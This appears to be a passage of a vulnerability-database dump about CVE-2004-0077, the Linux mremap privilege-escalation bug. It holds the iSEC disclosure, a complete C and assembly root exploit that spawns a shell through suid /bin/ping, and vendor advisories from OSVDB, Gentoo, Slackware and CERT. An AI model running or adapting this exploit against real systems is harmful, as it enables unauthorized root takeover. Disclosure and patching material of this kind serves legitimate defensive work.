Liability claims regarding damage caused by the use of any information \r\nprovided, including any kind of information which is incomplete or incorrect, \r\nwill therefore be rejected.\r\n\r\n\r\nAppendix:\r\n=========\r\n\r\n/*\r\n *\r\n * mremap missing do_munmap return check kernel exploit\r\n *\r\n * gcc -O3 -static -fomit-frame-pointer mremap_pte.c -o mremap_pte\r\n * ./mremap_pte [suid] [[shell]]\r\n *\r\n * Copyright (c) 2004 iSEC Security Research. All Rights Reserved.\r\n *\r\n * THIS PROGRAM IS FOR EDUCATIONAL PURPOSES *ONLY* IT IS PROVIDED "AS IS"\r\n * AND WITHOUT ANY WARRANTY. COPYING, PRINTING, DISTRIBUTION, MODIFICATION\r\n * WITHOUT PERMISSION OF THE AUTHOR IS STRICTLY PROHIBITED.\r\n *\r\n */\r\n\r\n#include <stdio.h>\r\n#include <stdlib.h>\r\n#include <errno.h>\r\n#include <unistd.h>\r\n#include <syscall.h>\r\n#include <signal.h>\r\n#include <time.h>\r\n#include <sched.h>\r\n\r\n#include <sys/mman.h>\r\n#include <sys/wait.h>\r\n#include <sys/utsname.h>\r\n\r\n#include <asm/page.h>\r\n\r\n\r\n#define str(s) #s\r\n#define xstr(s) str(s)\r\n\r\n// this is for standard kernels with 3/1 split\r\n#define STARTADDR 0x40000000\r\n#define PGD_SIZE (PAGE_SIZE * 1024)\r\n#define VICTIM (STARTADDR + PGD_SIZE)\r\n#define MMAP_BASE (STARTADDR + 3*PGD_SIZE)\r\n\r\n#define DSIGNAL SIGCHLD\r\n#define CLONEFL (DSIGNAL|CLONE_VFORK|CLONE_VM)\r\n\r\n#define MREMAP_MAYMOVE ( (1UL) << 0 )\r\n#define MREMAP_FIXED ( (1UL) << 1 )\r\n\r\n#define __NR_sys_mremap __NR_mremap\r\n\r\n\r\n// how many ld.so pages? 
this is the .text section length (like cat \r\n// /proc/self/maps) in pages\r\n#define LINKERPAGES 0x14\r\n\r\n// suid victim\r\nstatic char *suid="/bin/ping";\r\n\r\n// shell to start\r\nstatic char *launch="/bin/bash";\r\n\r\n\r\n_syscall5(ulong, sys_mremap, ulong, a, ulong, b, ulong, c, ulong, d, \r\n ulong, e);\r\nunsigned long sys_mremap(unsigned long addr, unsigned long old_len, \r\n unsigned long new_len, unsigned long flags, \r\n unsigned long new_addr);\r\n\r\nstatic volatile unsigned base, *t, cnt, old_esp, prot, victim=0;\r\nstatic int i, pid=0;\r\nstatic char *env[2], *argv[2];\r\nstatic ulong ret;\r\n\r\n\r\n// code to appear inside the suid image\r\nstatic void suid_code(void)\r\n{\r\n__asm__(\r\n " call callme \n"\r\n\r\n// setresuid(0, 0, 0), setresgid(0, 0, 0)\r\n "jumpme: xorl %ebx, %ebx \n"\r\n " xorl %ecx, %ecx \n"\r\n " xorl %edx, %edx \n"\r\n " xorl %eax, %eax \n"\r\n " mov $"xstr(__NR_setresuid)", %al \n"\r\n " int $0x80 \n"\r\n " mov $"xstr(__NR_setresgid)", %al \n"\r\n " int $0x80 \n"\r\n\r\n// execve(launch)\r\n " popl %ebx \n"\r\n " andl $0xfffff000, %ebx \n"\r\n " xorl %eax, %eax \n"\r\n " pushl %eax \n"\r\n " movl %esp, %edx \n"\r\n " pushl %ebx \n"\r\n " movl %esp, %ecx \n"\r\n " mov $"xstr(__NR_execve)", %al \n"\r\n " int $0x80 \n"\r\n\r\n// exit\r\n " xorl %eax, %eax \n"\r\n " mov $"xstr(__NR_exit)", %al \n"\r\n " int $0x80 \n"\r\n\r\n "callme: jmp jumpme \n"\r\n );\r\n}\r\n\r\n\r\nstatic int suid_code_end(int v)\r\n{\r\nreturn v+1;\r\n}\r\n\r\n\r\nstatic inline void get_esp(void)\r\n{\r\n__asm__(\r\n " movl %%esp, %%eax \n"\r\n " andl $0xfffff000, %%eax \n"\r\n " movl %%eax, %0 \n"\r\n : : "m"(old_esp)\r\n );\r\n}\r\n\r\n\r\nstatic inline void cloneme(void)\r\n{\r\n__asm__(\r\n " pusha \n"\r\n " movl $("xstr(CLONEFL)"), %%ebx \n"\r\n " movl %%esp, %%ecx \n"\r\n " movl $"xstr(__NR_clone)", %%eax \n"\r\n " int $0x80 \n"\r\n " movl %%eax, %0 \n"\r\n " popa \n"\r\n : : "m"(pid)\r\n );\r\n}\r\n\r\n\r\nstatic inline void 
my_execve(void)\r\n{\r\n__asm__(\r\n " movl %1, %%ebx \n"\r\n " movl %2, %%ecx \n"\r\n " movl %3, %%edx \n"\r\n " movl $"xstr(__NR_execve)", %%eax \n"\r\n " int $0x80 \n"\r\n : "=a"(ret)\r\n : "m"(suid), "m"(argv), "m"(env)\r\n );\r\n}\r\n\r\n\r\nstatic inline void pte_populate(unsigned addr)\r\n{\r\nunsigned r;\r\nchar *ptr;\r\n\r\n memset((void*)addr, 0x90, PAGE_SIZE);\r\n r = ((unsigned)suid_code_end) - ((unsigned)suid_code);\r\n ptr = (void*) (addr + PAGE_SIZE);\r\n ptr -= r+1;\r\n memcpy(ptr, suid_code, r);\r\n memcpy((void*)addr, launch, strlen(launch)+1);\r\n}\r\n\r\n\r\n// hit VMA limit & populate PTEs\r\nstatic void exhaust(void)\r\n{\r\n// mmap PTE donor\r\n t = mmap((void*)victim, PAGE_SIZE*(LINKERPAGES+3), PROT_READ|PROT_WRITE,\r\n MAP_PRIVATE|MAP_ANONYMOUS|MAP_FIXED, 0, 0);\r\n if(MAP_FAILED==t)\r\n goto failed;\r\n\r\n// prepare shell code pages\r\n for(i=2; i<LINKERPAGES+1; i++)\r\n pte_populate(victim + PAGE_SIZE*i);\r\n i = mprotect((void*)victim, PAGE_SIZE*(LINKERPAGES+3), PROT_READ);\r\n if(i)\r\n goto failed;\r\n\r\n// lock unmap\r\n base = MMAP_BASE;\r\n cnt = 0;\r\n prot = PROT_READ;\r\n printf("\n"); fflush(stdout);\r\n for(;;) {\r\n t = mmap((void*)base, PAGE_SIZE, prot, \r\n MAP_PRIVATE|MAP_ANONYMOUS|MAP_FIXED, 0, 0);\r\n if(MAP_FAILED==t) {\r\n if(ENOMEM==errno)\r\n break;\r\n else\r\n goto failed;\r\n }\r\n if( !(cnt%512) || cnt>65520 )\r\n printf("\r MMAP #%d 0x%.8x - 0x%.8lx", cnt, base,\r\n base+PAGE_SIZE); fflush(stdout);\r\n base += PAGE_SIZE;\r\n prot ^= PROT_EXEC;\r\n cnt++;\r\n }\r\n\r\n// move PTEs & populate page table cache\r\n ret = sys_mremap(victim+PAGE_SIZE, LINKERPAGES*PAGE_SIZE, PAGE_SIZE, \r\n MREMAP_FIXED|MREMAP_MAYMOVE, VICTIM);\r\n if(-1==ret)\r\n goto failed;\r\n\r\n munmap((void*)MMAP_BASE, old_esp-MMAP_BASE);\r\n t = mmap((void*)(old_esp-PGD_SIZE-PAGE_SIZE), PAGE_SIZE, \r\n PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS|MAP_FIXED, 0, \r\n 0);\r\n if(MAP_FAILED==t)\r\n goto failed;\r\n\r\n *t = *((unsigned 
*)old_esp);\r\n munmap((void*)VICTIM-PAGE_SIZE, old_esp-(VICTIM-PAGE_SIZE));\r\n printf("\n[+] Success\n\n"); fflush(stdout);\r\n return;\r\n\r\nfailed:\r\n printf("\n[-] Failed\n"); fflush(stdout);\r\n _exit(0);\r\n}\r\n\r\n\r\nstatic inline void check_kver(void)\r\n{\r\nstatic struct utsname un;\r\nint a=0, b=0, c=0, v=0, e=0, n;\r\n\r\n uname(&un);\r\n n=sscanf(un.release, "%d.%d.%d", &a, &b, &c);\r\n if(n!=3 || a!=2) {\r\n printf("\n[-] invalid kernel version string\n");\r\n _exit(0);\r\n }\r\n\r\n if(b==2) {\r\n if(c<=25)\r\n v=1;\r\n }\r\n else if(b==3) {\r\n if(c<=99)\r\n v=1;\r\n }\r\n else if(b==4) {\r\n if(c>18 && c<=24)\r\n v=1, e=1;\r\n else if(c>24)\r\n v=0, e=0;\r\n else\r\n v=1, e=0;\r\n }\r\n else if(b==5 && c<=75)\r\n v=1, e=1;\r\n else if(b==6 && c<=2)\r\n v=1, e=1;\r\n\r\n printf("\n[+] kernel %s vulnerable: %s exploitable %s",\r\n un.release, v? "YES" : "NO", e? "YES" : "NO" );\r\n fflush(stdout);\r\n\r\n if(v && e)\r\n return;\r\n _exit(0);\r\n}\r\n\r\n\r\nint main(int ac, char **av)\r\n{\r\n// prepare\r\n check_kver();\r\n memset(env, 0, sizeof(env));\r\n memset(argv, 0, sizeof(argv));\r\n if(ac>1) suid=av[1];\r\n if(ac>2) launch=av[2];\r\n argv[0] = suid;\r\n get_esp();\r\n\r\n// mmap & clone & execve\r\n exhaust();\r\n cloneme();\r\n if(!pid) {\r\n my_execve();\r\n } else {\r\n waitpid(pid, 0, 0);\r\n }\r\n\r\nreturn 0;\r\n}\r\n\r\n- -- \r\nPaul Starzetz\r\niSEC Security Research\r\nhttp://isec.pl/\r\n\r\n-----BEGIN PGP SIGNATURE-----\r\nVersion: GnuPG v1.0.7 (GNU/Linux)\r\n\r\niD8DBQFAQ3a/C+8U3Z5wpu4RAtOFAKCtT8EM9zn5n/maQlSwTZu2wkdHawCfYlht\r\nWdUJcKDwAzO44Dpmc9IqiEs=\r\n=mMKN\r\n-----END PGP SIGNATURE-----\r\n\r\n", "edition": 1, "modified": "2004-03-02T00:00:00", "published": "2004-03-02T00:00:00", "id": "SECURITYVULNS:DOC:5853", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:5853", "title": "mremap(2) full details available", "type": "securityvulns", "cvss": {"score": 7.2, "vector": 
"AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-08-31T11:10:09", "bulletinFamily": "software", "cvelist": ["CVE-2004-0077"], "description": "-----BEGIN PGP SIGNED MESSAGE-----\r\nHash: SHA1\r\n\r\nSynopsis: Linux kernel do_mremap VMA limit local privilege escalation\r\n vulnerability\r\nProduct: Linux kernel\r\nVersion: 2.2 up to 2.2.25, 2.4 up to 2.4.24, 2.6 up to 2.6.2\r\nVendor: http://www.kernel.org/\r\nURL: http://isec.pl/vulnerabilities/isec-0014-mremap-unmap.txt\r\nCVE: CAN-2004-0077\r\nAuthor: Paul Starzetz <ihaquer@isec.pl>\r\nDate: February 18, 2004\r\n\r\n\r\nIssue:\r\n======\r\n\r\nA critical security vulnerability has been found in the Linux kernel \r\nmemory management code inside the mremap(2) system call due to missing \r\nfunction return value check. This bug is completely unrelated to the \r\nmremap bug disclosed on 05-01-2004 except concerning the same internal \r\nkernel function code.\r\n\r\n\r\nDetails:\r\n========\r\n\r\nThe Linux kernel manages a list of user addressable valid memory \r\nlocations on a per process basis. Every process owns a single linked \r\nlist of so called virtual memory area descriptors (called from now on \r\njust VMAs). Every VMA describes the start of a valid memory region, its \r\nlength and moreover various memory flags like page protection. \r\n\r\nEvery VMA in the list corresponds to a part of the process's page table. \r\nThe page table contains descriptors (in short page table entries PTEs) \r\nof physical memory pages seen by the process. 
The VMA descriptor can be \r\nthus understood as a high level description of a particular region of \r\nthe process's page table storing PTE properties like page R/W flag and \r\nso on.\r\n\r\nThe mremap() system call provides resizing (shrinking or growing) as \r\nwell as moving of existing virtual memory areas or any of its parts \r\nacross process's addressable space.\r\n\r\nMoving a part of the virtual memory from inside a VMA area to a new \r\nlocation requires creation of a new VMA descriptor as well as copying \r\nthe underlying page table entries described by the VMA from the old to \r\nthe new location in the process's page table.\r\n\r\nTo accomplish this task the do_mremap code calls the do_munmap() \r\ninternal kernel function to remove any potentially existing old memory \r\nmapping in the new location as well as to remove the old virtual memory \r\nmapping. Unfortunately the code doesn't test the return value of the \r\ndo_munmap() function which may fail if the maximum number of available \r\nVMA descriptors has been exceeded. This happens if one tries to unmap \r\nmiddle part of an existing memory mapping and the process's limit on the \r\nnumber of VMAs has been reached (which is currently 65535).\r\n\r\nOne of the possible situations can be illustrated with the following \r\npicture. 
The corresponding page table entries (PTEs) have been marked \r\nwith o and x:\r\n\r\nBefore mremap():\r\n\r\n(oooooooooooooooooooooooo) (xxxxxxxxxxxx)\r\n[----------VMA1----------] [----VMA2----]\r\n [REMAPPED-VMA] <---------------|\r\n\r\n\r\nAfter mremap() without VMA limit:\r\n\r\n(oooo)(xxxxxxxxxxxx)(oooo)\r\n[VMA3][REMAPPED-VMA][VMA4]\r\n\r\n\r\nAfter mremap() but VMA limit:\r\n\r\n(ooooxxxxxxxxxxxxxxoooo)\r\n[---------VMA1---------]\r\n [REMAPPED-VMA]\r\n\r\n\r\nAfter the maximum number of VMAs in the process's VMA list has been \r\nreached do_munmap() will refuse to create the necessary VMA hole because \r\nit would split the original VMA in two disjoint VMA areas exceeding the \r\nVMA descriptor limit.\r\n\r\nDue to the missing return value check after trying to unmap the middle \r\nof the VMA1 (this is the first invocation of do_munmap inside do_mremap \r\ncode) the corresponding page table entries from VMA2 are still inserted \r\ninto the page table location described by VMA1 thus being subject to \r\nVMA1 page protection flags. It must be also mentioned that the original \r\nPTEs in the VMA1 are lost thus leaving the corresponding page frames \r\nunusable for ever.\r\n\r\nThe kernel also tries to insert the overlapping VMA area into the VMA \r\ndescriptor list but this fails due to further checks in the low level \r\nVMA manipulation code. The low level VMA list check in the 2.4 and 2.6 \r\nkernel versions just call BUG() therefore terminating the malicious \r\nprocess.\r\n\r\nThere are also two other unchecked calls to do_munmap() inside the \r\ndo_mremap() code and we believe that the second occurrence of unchecked \r\ndo_munmap is also exploitable. The second occurrence takes place if the \r\nVMA to be remapped is being truncated in place. 
Note that do_munmap can \r\nalso fail on an exceptional low memory condition while trying to \r\nallocate a VMA descriptor.\r\n\r\nWe were able to create a robust proof-of-concept exploit code giving \r\nfull super-user privileges on all vulnerable kernel versions. The \r\nexploit code will be released next week.\r\n\r\n\r\nImpact:\r\n=======\r\n\r\nSince no special privileges are required to use the mremap(2) system \r\ncall any process may use its unexpected behavior to disrupt the kernel \r\nmemory management subsystem.\r\n\r\nProper exploitation of this vulnerability leads to local privilege \r\nescalation giving an attacker full super-user privileges. The \r\nvulnerability may also lead to a denial-of-service attack on the \r\navailable system memory.\r\n\r\nTested and known to be vulnerable kernel versions are all <= 2.2.25, <= \r\n2.4.24 and <= 2.6.1. The 2.2.25 version of Linux kernel does not \r\nrecognize the MREMAP_FIXED flag but this does not prevent the bug from \r\nbeing successfully exploited. All users are encouraged to patch all \r\nvulnerable systems as soon as appropriate vendor patches are released. \r\nThere is no hotfix for this vulnerability. Limited per user virtual \r\nmemory still permits do_munmap() to fail.\r\n\r\n\r\nCredits:\r\n========\r\n\r\nPaul Starzetz <ihaquer@isec.pl> has identified the vulnerability and \r\nperformed further research. COPYING, DISTRIBUTION, AND MODIFICATION OF \r\nINFORMATION PRESENTED HERE IS ALLOWED ONLY WITH EXPRESS PERMISSION OF \r\nONE OF THE AUTHORS.\r\n\r\n\r\nDisclaimer:\r\n===========\r\n\r\nThis document and all the information it contains are provided "as is", \r\nfor educational purposes only, without warranty of any kind, whether \r\nexpress or implied.\r\n\r\nThe authors reserve the right not to be responsible for the topicality, \r\ncorrectness, completeness or quality of the information provided in \r\nthis document. 
Liability claims regarding damage caused by the use of \r\nany information provided, including any kind of information which is \r\nincomplete or incorrect, will therefore be rejected.\r\n\r\n- -- \r\nPaul Starzetz\r\niSEC Security Research\r\nhttp://isec.pl/\r\n\r\n-----BEGIN PGP SIGNATURE-----\r\nVersion: GnuPG v1.0.7 (GNU/Linux)\r\n\r\niD8DBQFAM1QzC+8U3Z5wpu4RAqXzAKCMOkFu1mXzzRgLyuFYp4ORpQCQDgCfe4M2\r\n3IjbGvzniOjv/Hc7KKAzMtU=\r\n=GJds\r\n-----END PGP SIGNATURE-----\r\n\r\n\r\n_______________________________________________\r\nFull-Disclosure - We believe in it.\r\nCharter: http://lists.netsys.com/full-disclosure-charter.html", "edition": 1, "modified": "2004-02-18T00:00:00", "published": "2004-02-18T00:00:00", "id": "SECURITYVULNS:DOC:5788", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:5788", "title": "[Full-Disclosure] Second critical mremap() bug found in all Linux kernels", "type": "securityvulns", "cvss": {"score": 7.2, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "osvdb": [{"lastseen": "2017-04-28T13:19:58", "bulletinFamily": "software", "cvelist": ["CVE-2004-0077"], "edition": 1, "description": "## Vulnerability Description\nThe Linux kernel contains a flaw that may allow a malicious user to gain access to unauthorized privileges due to improper checks on return values performed in the do_mremap function for the mremap system call. This flaw may lead to a loss of Confidentiality, Integrity and Availability.\n\n## Solution Description\nUpgrade to version 2.4.25 or higher, or 2.6.3 or higher, as it has been reported to fix this vulnerability. An upgrade is required as there are no known workarounds.\n## Short Description\nThe Linux kernel contains a flaw that may allow a malicious user to gain access to unauthorized privileges due to improper checks on return values performed in the do_mremap function for the mremap system call. 
This flaw may lead to a loss of Confidentiality, Integrity and Availability.\n\n## References:\nVendor URL: http://www.kernel.org/\nVendor Specific Solution URL: http://distro.conectiva.com/atualizacoes/index.php?id=a&anuncio=000820\nVendor Specific Solution URL: http://www.debian.org/security/2004/dsa-438\nVendor Specific Solution URL: http://www.debian.org/security/2004/dsa-444\nVendor Specific Solution URL: http://www.debian.org/security/2004/dsa-454\nVendor Specific Solution URL: http://www.mandrakesecure.net/en/advisories/advisory.php?name=MDKSA-2004:015\nVendor Specific Solution URL: http://www.slackware.org/security/viewer.php?l=slackware-security&y=2004&m=slackware-security.541911\nVendor Specific Solution URL: http://www.debian.org/security/2004/dsa-440\nVendor Specific Solution URL: http://www.debian.org/security/2004/dsa-456\nVendor Specific Solution URL: http://www.turbolinux.com/security/2004/TLSA-2004-7.txt\nVendor Specific Solution URL: http://www.debian.org/security/2004/dsa-442\nVendor Specific Solution URL: http://www.debian.org/security/2004/dsa-450\nVendor Specific Solution URL: http://www.debian.org/security/2004/dsa-466\nVendor Specific Solution URL: http://www.debian.org/security/2004/dsa-470\nVendor Specific Solution URL: http://www.suse.de/de/security/2004_05_linux_kernel.html\nVendor Specific Solution URL: http://lists.trustix.org/pipermail/tsl-announce/2004-February/000218.html\nVendor Specific Solution URL: http://www.debian.org/security/2004/dsa-439\nVendor Specific Solution URL: http://www.debian.org/security/2004/dsa-475\nVendor Specific Solution URL: http://www.gentoo.org/security/en/glsa/glsa-200403-02.xml/MSS-OAR-E01-2004.0290.1\nVendor Specific Solution URL: http://mail.immunix.com/pipermail/immunix-announce/2004-February/0102.html\nVendor Specific Solution URL: http://www.mandrakesecure.net/en/advisories/advisory.php?name=MDKSA-2004:015-1\n[Vendor Specific Advisory 
URL](http://smoothwall.org/security/advisories/SWP-2004.002.html)\n[Vendor Specific Advisory URL](https://rhn.redhat.com/errata/RHSA-2004-069.html)\n[Vendor Specific Advisory URL](https://rhn.redhat.com/errata/RHSA-2004-106.html)\n[Vendor Specific Advisory URL](https://rhn.redhat.com/errata/RHSA-2004-065.html)\nSecurity Tracker: 1009095\n[Secunia Advisory ID:10897](https://secuniaresearch.flexerasoftware.com/advisories/10897/)\n[Secunia Advisory ID:11276](https://secuniaresearch.flexerasoftware.com/advisories/11276/)\nOther Advisory URL: http://isec.pl/vulnerabilities/isec-0014-mremap-unmap.txt\nISS X-Force ID: 15244\nGeneric Exploit URL: http://www.packetstormsecurity.org/0403-exploits/isec-0014-mremap-unmap.v2.txt\n[CVE-2004-0077](https://vulners.com/cve/CVE-2004-0077)\nCIAC Advisory: o-082\nCIAC Advisory: o-094\nCIAC Advisory: o-126\nCERT VU: 981222\nBugtraq ID: 9686\n", "modified": "2004-02-18T09:15:42", "published": "2004-02-18T09:15:42", "href": "https://vulners.com/osvdb/OSVDB:3986", "id": "OSVDB:3986", "type": "osvdb", "title": "Linux Kernel mremap() Missing Return Value Checking\n Privilege Escalation", "cvss": {"score": 7.2, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "gentoo": [{"lastseen": "2016-09-06T19:46:49", "bulletinFamily": "unix", "cvelist": ["CVE-2004-0077"], "edition": 1, "description": "### Background\n\nThe Linux kernel is responsible for memory management in a working system - to allow this, processes are allowed to allocate and deallocate memory. \n\n### Description\n\nThe memory subsystem allows for shrinking, growing, and moving of chunks of memory along any of the allocated memory areas which the kernel possesses. 
\n\nTo accomplish this, the do_mremap code calls the do_munmap() kernel function to remove any old memory mappings in the new location - but, the code doesn't check the return value of the do_munmap() function which may fail if the maximum number of available virtual memory area descriptors has been exceeded. \n\nDue to the missing return value check after trying to unmap the middle of the first memory area, the corresponding page table entries from the second new area are inserted into the page table locations described by the first old one, thus they are subject to page protection flags of the first area. As a result, arbitrary code can be executed. \n\n### Impact\n\nArbitrary code with normal non-super-user privileges may be able to exploit this vulnerability and may disrupt the operation of other parts of the kernel memory management subroutines finally leading to unexpected behavior. \n\nSince no special privileges are required to use the mremap() and munmap() system calls any process may misuse this unexpected behavior to disrupt the kernel memory management subsystem. Proper exploitation of this vulnerability may lead to local privilege escalation allowing for the execution of arbitrary code with kernel level root access. \n\nProof-of-concept exploit code has been created and successfully tested, permitting root escalation on vulnerable systems. As a result, all users should upgrade their kernels to new or patched versions. \n\n### Workaround\n\nUsers who are unable to upgrade their kernels may attempt to use \"sysctl -w vm.max_map_count=1000000\", however, this is a temporary fix which only solves the problem by increasing the number of memory areas that can be created by each process. Because of the static nature of this workaround, it is not recommended and users are urged to upgrade their systems to the latest available patched sources. 
\n\n### Resolution\n\nUsers are encouraged to upgrade to the latest available sources for their system: \n \n \n # emerge sync\n # emerge -pv your-favourite-sources\n # emerge your-favourite-sources\n # # Follow usual procedure for compiling and installing a kernel.\n # # If you use genkernel, run genkernel as you would do normally.\n \n # # IF YOUR KERNEL IS MARKED as \"remerge required!\" THEN\n # # YOU SHOULD UPDATE YOUR KERNEL EVEN IF PORTAGE\n # # REPORTS THAT THE SAME VERSION IS INSTALLED.", "modified": "2006-05-22T00:00:00", "published": "2004-03-05T00:00:00", "id": "GLSA-200403-02", "href": "https://security.gentoo.org/glsa/200403-02", "type": "gentoo", "title": "Linux kernel do_mremap local privilege escalation vulnerability", "cvss": {"score": 7.2, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "slackware": [{"lastseen": "2019-05-30T07:36:58", "bulletinFamily": "unix", "cvelist": ["CVE-2003-0985", "CVE-2004-0077"], "description": "New kernels are available for Slackware 9.1 and -current to fix\na bounds-checking problem in the kernel's mremap() call which\ncould be used by a local attacker to gain root privileges.\nPlease note that this is not the same issue as CAN-2003-0985\nwhich was fixed in early January.\n\nThe kernels in Slackware 8.1 and 9.0 that were updated in\nJanuary are not vulnerable to this new issue because the patch\nfrom Solar Designer that was used to fix the CAN-2003-0985 bugs\nalso happened to fix the problem that was discovered later.\n\nSites running Slackware 9.1 or -current should upgrade to a\nnew kernel. 
After installing the new kernel, be sure to run\n'lilo'.\n\nMore details about this issue may be found in the Common\nVulnerabilities and Exposures (CVE) database:\n\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2004-0077\n\n\nHere are the details from the Slackware 9.1 ChangeLog:\n\nWed Feb 18 03:44:42 PST 2004\npatches/kernels/: Recompiled to fix another bounds-checking error in\n the kernel mremap() code. (this is not the same issue that was fixed\n on Jan 6) This bug could be used by a local attacker to gain root\n privileges. Sites should upgrade to a new kernel. After installing\n the new kernel, be sure to run 'lilo'.\n For more details, see:\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2004-0077\n Thanks to Paul Starzetz for finding and researching this issue.\n (* Security fix *)\npatches/packages/kernel-ide-2.4.24-i486-2.tgz: Patched, recompiled.\n (* Security fix *)\npatches/packages/kernel-source-2.4.24-noarch-2.tgz: Patched the kernel\n source with a fix for the mremap() problem from Solar Designer, and\n updated the Speakup driver (not pre-applied).\n (* Security fix *)\n\nWHERE TO FIND THE NEW PACKAGES:\n\nUpdated packages for Slackware 9.1:\nftp://ftp.slackware.com/pub/slackware/slackware-9.1/patches/packages/kernel-ide-2.4.24-i486-2.tgz\nftp://ftp.slackware.com/pub/slackware/slackware-9.1/patches/packages/kernel-source-2.4.24-noarch-2.tgz\n\nAn alternate kernel may be installed. 
Those are found in this directory:\nftp://ftp.slackware.com/pub/slackware/slackware-9.1/patches/kernels/\n\n\nUpdated packages for Slackware -current:\nftp://ftp.slackware.com/pub/slackware/slackware-current/slackware/a/kernel-ide-2.4.24-i486-2.tgz\nftp://ftp.slackware.com/pub/slackware/slackware-current/slackware/k/kernel-source-2.4.24-noarch-2.tgz\nftp://ftp.slackware.com/pub/slackware/slackware-current/bootdisks/\nftp://ftp.slackware.com/pub/slackware/slackware-current/kernels/\n\n\nMD5 SIGNATURES:\n\nMD5 signatures may be downloaded from our FTP server:\n\n\nSlackware 9.1 packages:\nftp://ftp.slackware.com/pub/slackware/slackware-9.1/patches/CHECKSUMS.md5\n\nTo verify authenticity, this file has been signed with the Slackware\nGPG key (use 'gpg --verify'):\n\nftp://ftp.slackware.com/pub/slackware/slackware-9.1/patches/CHECKSUMS.md5.asc\n\n\nSlackware -current packages:\nftp://ftp.slackware.com/pub/slackware/slackware-current/CHECKSUMS.md5\nftp://ftp.slackware.com/pub/slackware/slackware-current/CHECKSUMS.md5.asc\n\n\nINSTALLATION INSTRUCTIONS:\n\nUse upgradepkg to install the new kernel package.\nAfter installing the kernel-ide package you will need to run lilo ('lilo' at\na command prompt) or create a new system boot disk ('makebootdisk'), and\nreboot.\n\nIf desired, a kernel from the kernels/ directory may be used instead. 
For\nexample, to use the kernel in kernels/scsi.s/, you would copy it to the\nboot directory like this:\n\ncd kernels/scsi.s\ncp bzImage /boot/vmlinuz-scsi.s-2.4.24\n\nCreate a symbolic link:\nln -sf /boot/vmlinuz-scsi.s-2.4.24 /boot/vmlinuz\n\nThen, run 'lilo' or create a new system boot disk and reboot.", "modified": "2004-02-18T04:37:55", "published": "2004-02-18T04:37:55", "id": "SSA-2004-049-01", "href": "http://www.slackware.com/security/viewer.php?l=slackware-security&y=2004&m=slackware-security.541911", "type": "slackware", "title": "Kernel security update", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}], "cert": [{"lastseen": "2020-09-18T20:44:02", "bulletinFamily": "info", "cvelist": ["CVE-2003-0985", "CVE-2004-0077"], "description": "### Overview \n\nA vulnerability in the Linux `mremap(2)` system call could allow an authenticated, local attacker to execute arbitrary code with root privileges.\n\n### Description \n\nThe Linux kernel uses a linked list of virtual memory area (VMA) descriptors to reference valid regions of the page table for a given process. VMA descriptors include information about the memory area such as start address, length, and page protection flags. A VMA effectively contains a range of page table entries (PTEs) that make up part of the page table.\n\nThe `mremap(2)` system call has the ability to resize or move a VMA or part of a VMA within a process' memory space. `mremap(2)` contains a function called `do_munmap()` that is used to unmap regions of memory during resize or move operations. There is a limit on the number of VMA descriptors that can exist at one time, and `do_munmap()` does not create a new VMA descriptor if doing so would exceed this limit. \n \nIn certain cases, `mremap(2)` does not properly check the return value from the `do_munmap()` function, and will map PTEs to new locations even though the expected VMAs have not been created or updated. 
By carefully manipulating VMA to PTE relationships, a local attacker can read from or write to memory owned by a process running with different privileges. \n \nFurther technical details are available in an [advisory](<http://isec.pl/vulnerabilities/isec-0014-mremap-unmap.txt>) from iSEC. Note that this vulnerability is distinct from the one described in VU#490620/CAN-2003-0985. \n \n--- \n \n### Impact \n\nAn authenticated, local attacker could execute arbitrary code with root privileges. \n \n--- \n \n### Solution \n\n**Patch or Upgrade** \n \nApply a patch or upgrade as specified by your vendor. This issue is resolved in Linux kernels [2.2.26](<http://www.kernel.org/pub/linux/kernel/v2.2/ChangeLog-2.2.26>), [2.4.25](<http://www.kernel.org/pub/linux/kernel/v2.4/ChangeLog-2.4.25>), and [2.6.3](<http://www.kernel.org/pub/linux/kernel/v2.6/ChangeLog-2.6.3>) from the [Linux Kernel Archives](<http://www.kernel.org/>). \n \n--- \n \n### Vendor Information\n\n981222\n\n### Astaro __ Affected\n\nUpdated: March 25, 2004 \n\n### Status\n\nAffected\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nPlease see [Up2Date 4.021 #35996](<http://www.astaro.org/showflat.php?Cat=&Number=35996>).\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23981222 Feedback>).\n\n### Conectiva __ Affected\n\nNotified: March 10, 2004 Updated: March 11, 2004 \n\n### Status\n\nAffected\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nPlease see [CLSA-2004:820](<http://distro.conectiva.com.br/atualizacoes/index.php?id=a&anuncio=000820&idioma=en>).\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23981222 Feedback>).\n\n### Debian __ Affected\n\nNotified: March 10, 2004 Updated: March 11, 2004 \n\n### Status\n\nAffected\n\n### Vendor Statement\n\nWe have fixed this problem for our various kernels in the following advisories: \n \n<http://www.debian.org/security/2004/dsa-456> \n<http://www.debian.org/security/2004/dsa-454> \n<http://www.debian.org/security/2004/dsa-453> \n<http://www.debian.org/security/2004/dsa-450> \n<http://www.debian.org/security/2004/dsa-444> \n<http://www.debian.org/security/2004/dsa-442> \n<http://www.debian.org/security/2004/dsa-440> \n<http://www.debian.org/security/2004/dsa-439> \n<http://www.debian.org/security/2004/dsa-441> \n<http://www.debian.org/security/2004/dsa-438>\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this 
